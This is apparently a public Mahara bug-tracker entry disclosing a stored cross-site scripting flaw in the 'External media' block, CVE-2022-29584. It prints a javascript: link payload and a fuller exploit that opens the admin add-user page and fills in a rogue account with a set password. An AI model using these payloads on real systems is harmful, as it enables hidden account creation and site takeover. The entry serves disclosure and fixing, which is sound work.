XSS exploit in 'External media' block

Bug #1968920 reported by Kristina Hoeppner
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Fix Released
Fix Released
Fix Released
Fix Released
Fix Released

Bug Description

When you put the following into the 'External media' block, you get an alert pop-up window.

<a class="embedly-card" href="javascript:alert(document.domain)">Link</a>

In contrast to text blocks where the 'javascript:alert' is stripped out, this is not the case in 'External media'.

It wasn't a problem when the class wasn't present, but with the class, a pop-up with the current domain is displayed.

CVE References

description: updated
Changed in mahara:
status: New → Confirmed
importance: Undecided → High
Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote :

Example exploit:

<a class="embedly-card" href="javascript: {var TestFenster = http://window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill);}">open the gate</a>

Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.


Things to keep in mind:

- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:

Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote (last edit ):

Vulnerability type: Cross-site scripting (XSS) / stored XSS
Attack type: Remote
Impact: Code execution

Affected components: The 'External media' block and anywhere you can enter HTML code, such as a text block, notes, journal entry, and forum post.

Suggested description: Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 are vulnerable to stored cross-site scripting when a particular CSS class for embedly is used and JavaScript code constructed to perform an action.

Reported by: Can't disclose
Bug report: https://bugs.launchpad.net/mahara/+bug/1968920
CVE reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29584

Robert Lyon (robertl-9)
no longer affects: mahara/20.10
no longer affects: mahara/22.10
Gold (gold.catalyst)
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.